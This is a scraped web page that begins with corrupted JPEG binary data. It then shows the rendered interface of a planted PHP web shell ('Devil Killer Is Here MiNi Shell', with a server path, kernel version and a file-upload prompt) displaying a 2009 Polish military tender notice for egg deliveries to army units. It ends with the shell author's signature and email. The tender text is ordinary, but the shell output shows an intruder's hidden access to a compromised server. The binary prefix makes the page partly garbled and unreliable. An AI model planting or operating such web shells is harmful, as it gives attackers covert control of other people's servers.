JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20091009/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20091009/353458-N-2009.html

<p class="kh_header"><b>Dęblin: Dstawa jaj spożywczych</b><br>
<b>Numer ogłoszenia: 353458 - 2009; data zamieszczenia: 09.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa 4824 , Osiedle Stawy, 08-530 Dęblin, woj. lubelskie, tel. 081 8651632 w. 203, faks 081 8651702 w. 225.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.army.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Wojskowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dstawa jaj spożywczych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa jaj spożywczych A-L do niżej wymienionych jednostek wojskowych tj.:

JW 4819 LUBLIN		- ul. Kruczkowskiego 49; 20-468 Lublin
- ul. Lubelska 139; 22-100 Chełm
JW 4219 DĘBLIN - 5 WOG	- Lotnisko 205; 08-521 Dęblin
JW 4824 STAWY		- Stawy; 08-530 Dęblin
JW 3463 RADOM		- ul. Lubelska 150, 26-600 Radom
JW 4055 HRUBIESZÓW	- ul. Dwernickiego 4; 22-500 Hrubieszów
JW 3391 ZAMOŚĆ		- ul. Piłsudskiego 36; 22-400 Zamość
JW 2090 NOWA DĘBA	- ul. Anieli Krzywoń 1; 39-460 Nowa Dęba
JW 3527 NISKO		- ul. Sandomierska 20; 37-400 Nisko
JW 3533 SANDOMIERZ	- ul. Mickiewicza 38, 27-600 Sandomierz
21 RWT RZESZÓW		- ul. Krakowska 11 b; 35-901 Rzeszów
JW 3489 RZESZÓW		- ul. Langiewicza 4; 35-922 Rzeszów
- 21 bdow; ul. Dąbrowskiego 22
JW 3841 RZESZÓW		- ul. Lwowska 5; 35-922 Rzeszów
JW 1947 PRZEMYŚL		- ul. 29- go Listopada; 37-700 Przemyśl
JW 3957 JAROSŁAW	- ul. 3-go Maja 80; 37-500 Jarosław
JW 3233 ŻURAWICA		- ul. Wojska Polskiego 22; 37-710 Żurawica

Szczegółowy opis przedmiotu zamówienia zawarto w SIWZ.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.01.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wykonawca przystępujący do przetargu zobowiązany jest przed upływem terminu składania ofert wnieść wadium.
Wysokość wadium Zamawiający ustalił w kwocie:
zadanie nr 1	-  600 zł
zadanie nr 2	-  400 zł<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W postępowaniu mogą wziąć udział Wykonawcy spełniający warunki określone w art. 22 ustawy Pzp (Dz. U. z 2007 r. Nr 223, poz. 1655) oraz w specyfikacji istotnych warunków zamówienia tj.:
1)	Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień. Warunek ten spełnią ci Wykonawcy, którzy prowadzą potwierdzoną wpisem do ewidencji lub właściwego rejestru działalność gospodarczą, ponadto posiadają decyzję w sprawie zatwierdzenia zakładu wydaną przez Powiatowego Lekarza Weterynarii na podst. przepisów ustawy 
z 16 grudnia 2005 r. o produktach pochodzenia zwierzęcego (D.U. 2006, Nr 17,
poz. 127 ze zm.) lub właściwy organ Państwowej Inspekcji Sanitarnej na podst. przepisów ustawy z 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia
(D.U. Nr 171, poz. 1225). W poprzednim stanie prawnym decyzję wydaną przez właściwy organ Państwowej Inspekcji Sanitarnej, a w odniesieniu do uprawnień, o których mowa
w art. 40 ust. 5 - organ Inspekcji Weterynaryjnej dopuszczającą zakład do prowadzenia produkcji, stwierdzającą spełnianie wymagań koniecznych do zapewnienia higieny
w procesie produkcji lub w obrocie oraz do zapewnienia właściwej jakości zdrowotnej artykułów (art. 27.1 ustawy z 11 listopada 2001 r. o warunkach zdrowotnych żywności
i żywienia D.U. 2005, Nr 31, poz. 265).  
2)	Posiadają niezbędną wiedzę i doświadczenie oraz potencjał techniczny, a także dysponują osobami zdolnymi do wykonywania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia na potwierdzenie, czego przedłożą wykaz wykonanych dostaw w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością dostawom stanowiącym przedmiot zamówienia z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców wraz 
z dokumentami potwierdzającymi należyte wykonanie, co najmniej jednej dostawy 
z wykazu. Za dostawę odpowiadającą swoją wartością dostawom stanowiącym przedmiot zamówienia, Zamawiający uzna zrealizowanie w ramach jednej umowy dostawy o wartości nie mniejszej niż 50% wartości składanej oferty. Przez wartość składanej oferty, Zamawiający rozumie sumę wartości brutto wszystkich zadań, na które została złożona oferta. 
3)	Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia. Warunek ten spełnią ci Wykonawcy, którzy posiadają:
a)	środki finansowe lub zdolność kredytową na poziomie nie mniejszym niż 15% wartości brutto składanej oferty. Przez wartość składanej oferty, Zamawiający rozumie sumę wartości brutto wszystkich zadań, na które została złożona oferta;
b)	polisę lub inny dokument ubezpieczenia potwierdzający ubezpieczenie wykonawcy 
od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej;
4)	Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie 
art. 24 ustawy;
5)	Wdrożyli i stosują w produkcji i obrocie wymienionego w SIWZ asortymentu system HACCP. Jeżeli Wykonawca nie jest producentem obowiązany jest dostarczać przedmiot zamówienia od producenta spełniającego takie wymagania.
6)	Dokonali zgłoszenia wojewódzkiemu inspektorowi jakości handlowej artykułów rolno-spożywczych podjęcia działalności gospodarczej w zakresie produkcji, składowania, konfekcjonowania i obrotu artykułami rolno-spożywczymi - jeżeli ustawa nakłada taki obowiązek.

Opis sposobu dokonywania oceny spełniania warunków wymaganych od Wykonawcy:
Zamawiający dokona oceny spełniania warunków wymaganych od Wykonawcy na podstawie dokumentów i oświadczeń przedłożonych wraz z ofertą. Poszczególne warunki oceniane będą przez Zamawiającego metodą spełnia/nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykonawca w celu potwierdzenia spełniania warunków udziału w postępowaniu, obowiązany jest dołączyć do oferty:
1)	Następujące oświadczenia, które można złożyć na formularzu oferty: 
a)	oświadczenie Wykonawcy, iż oferowany przez niego przedmiot zamówienia spełnia wszystkie wymagania opisane przez zamawiającego w SIWZ;
b)	oświadczenie Wykonawcy, iż wzór umowy stanowiący załącznik nr 4 SIWZ został przez niego zaakceptowany i zobowiązuje się w przypadku wyboru jego oferty do zawarcia umowy na warunkach w niej określonych i terminie wyznaczonym przez Zamawiającego;
c)	oświadczenie Wykonawcy, iż zobowiązuje się do wniesienia zabezpieczenia należytego wykonania umowy w  wysokości 10 % ceny ofertowej brutto z chwilą uznania jego oferty za najkorzystniejszą i zaproszenia do podpisania umowy przez Zamawiającego;
d)	oświadczenie Wykonawcy, iż zobowiązuje się do przedłożenia aktualnej polisy OC (deliktowej) z rozszerzonym zakresem ubezpieczenia (lub odrębną) od odpowiedzialności cywilnej Wykonawcy za szkody osobowe lub rzeczowe wyrządzone przez produkty wyprodukowane, dostarczone lub sprzedane przez Wykonawcę gdzie wartość polisy będzie nie mniejsza niż wartość brutto umowy/umów, do których podpisania Wykonawca został zaproszony;
e)	oświadczenie Wykonawcy, iż zobowiązuje się z chwilą wyboru oferty do przedłożenia świadectw jakości handlowej na środki spożywcze będące przedmiotem zamówienia; 
f)	oświadczenie, Wykonawcy o dostarczaniu przedmiotu zamówienia od producenta spełniającego wszystkie powszechnie obowiązujące w Polsce wymagania higieniczno-sanitarne - jeżeli Wykonawca sam nie jest producentem oferowanych produktów.
2)	Następujące dokumenty i oświadczenia wykraczające poza formularz oferty:
a)	oświadczenie o spełnianiu warunków określonych art. 22 ust.1 pkt 1-4 ustawy (załącznik nr 2 SIWZ);
b)	wykaz wykonanych dostaw obejmujący ich wartość, przedmiot, datę wykonania 
i odbiorców (załącznik nr 3) wraz z dokumentami (referencje, opinie) potwierdzającymi, że co najmniej jedna dostawa wymieniona w wykazie spełniająca warunki opisane w rozdziale IV SIWZ została wykonana należycie;
c)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Wykonawca może złożyć zaświadczenie o wpisie do ewidencji działalności gospodarczej wydane
z wcześniejszą datą, pod warunkiem, że urząd wydający zaświadczenie potwierdzi jego aktualność na dany dzień -  stan aktualny na dzień .... przypadający na 6 miesięcy przed upływem terminu składania ofert;
d)	decyzja wydana przez właściwy organ Państwowej Inspekcji Sanitarnej lub organ Inspekcji Weterynaryjnej;
e)	informacja z banku lub spółdzielczej kasy oszczędnościowo-rozliczeniowej,
w którym Wykonawca posiada rachunek, potwierdzająca wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy, wystawiona nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
	Uwaga: jeżeli informacja z banku lub spółdzielczej kasy oszczędnościowo-rozliczeniowej będzie potwierdzała wysokość posiadanych środków finansowych lub zdolność kredytową poprzez użycie zwrotu przykładowo w kwocie sześciocyfrowej - wówczas zostanie odczytana przy ocenie spełniania warunków jako kwota równa 100 000 PLN. Ponadto, jeżeli informacja z banku lub spółdzielczej kasy oszczędnościowo-rozliczeniowej będzie potwierdzać wysokość posiadanych środków finansowych lub zdolność kredytową w walucie innej niż PLN (zł.), Zamawiający dokona przeliczenia na PLN (zł.) wg średniego kursu NBP z dnia, na który potwierdzony jest stan środków finansowych, lub z dnia, na który określona została zdolność kredytowa. W przypadku, gdy w przedstawionej informacji nie zostanie określony taki dzień, wartość wskazana w walucie innej, niż PLN (zł.) zostanie przeliczona na PLN (zł.) wg kursu średniego NBP na dzień upływu terminu składania ofert; 
f)	polisa lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej;
g)	dowód wniesienia wadium (kserokopia);
h)	w przypadku Wykonawców nie będących producentami należy przedstawić wykaz osób i podmiotów, które są producentami.
3)	Wykonawca w celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym przez Zamawiającego w opisie przedmiotu zamówienia (załącznik nr 5), obowiązany jest dołączyć do oferty cenowej:
a)	dokument wystawiony na Wykonawcę przez organy upoważnione do urzędowej kontroli żywności lub certyfikat stwierdzający, że u Wykonawcy w produkcji
i w obrocie zaoferowanego do dostawy asortymentu został wdrożony i jest stosowany system HACCP;
b)	zaświadczenie wystawione przez WIJHARS lub karta zgłoszenia poświadczona przez WIJHARS potwierdzające, że prowadzona przez Wykonawcę działalność gospodarcza w zakresie produkcji, składowania, konfekcjonowania i obrotu artykułami rolno-spożywczymi została zgłoszona właściwemu ze względu na miejsce zamieszkania lub siedzibę Wykonawcy wojewódzkiemu inspektorowi jakości handlowej artykułów rolno-spożywczych;

Informacja o dopuszczalności powierzenia wykonania części zamówienia podwykonawcom
Jeżeli Wykonawca zamierza powierzyć wykonanie części zamówienia publicznego, podwykonawcom, zobowiązany jest wskazać w ofercie tę część zamówienia oraz podać nazwę (firmę) proponowanych podwykonawców. W takim przypadku Wykonawca odpowiedzialny jest za działania i zaniechania podwykonawców, którym powierza wykonanie części zamówienia, jak za własne działanie lub zaniechanie..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.army.mil.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Jednostka Wojskowa 4824 Stawy, 08-530 Dęblin, woj. lubelskie.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.10.2009 godzina 11:00, miejsce: Siedziba Zamawiającego, budynek nr 2 pokój nr 101-102 (Kancelaria Jawna).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa jaj spożywczych do jednostek wojskowych z obszaru Lublina.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa jaj spożywczych do jednostek wojskowych z obszaru Lublina
1 x na 2 tygodnie.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa jaj spożywczych do jednostek wojskowych z obszaru Rzeszowa.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa jaj spożywczych do jednostek wojskowych z obszaru Rzeszowa
1 x na 2 tygodnie.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com